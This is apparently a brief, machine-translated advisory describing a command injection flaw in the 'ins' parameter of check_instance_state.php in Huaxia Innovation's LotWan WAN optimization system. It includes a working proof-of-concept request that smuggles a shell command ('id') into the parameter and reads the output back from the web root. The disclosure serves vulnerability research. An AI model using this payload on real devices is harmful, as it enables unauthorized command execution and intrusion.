Huaxia Innovation Lotwan Wan Optimization System Check_instance_state Php Remote Command Execution Vulnerability
Huaxia Innovation Lotwan Wan Optimization System Check_instance_state Php Remote Command Execution Vulnerability
Huaxia Innovation LotWan WAN Optimization System check_instance_state.php Remote Command Execution Vulnerability
Vulnerability Description
Huaxia Innovation LotWan WAN optimization system check_instance_state.php file parameters ins have command splicing, resulting in remote command execution vulnerabilities
Vulnerability Impact
Huaxia Innovation LotWan WAN Optimization System
Network surveying and mapping
Vulnerability reappears
Login page
The file with vulnerability is
1
/acc/check_instance_state.php?ins=;id>cmd.txt
Visit /acc/cmd.txt again
If you gain something, just like it
This post is licensed under CC BY 4.0 by the author.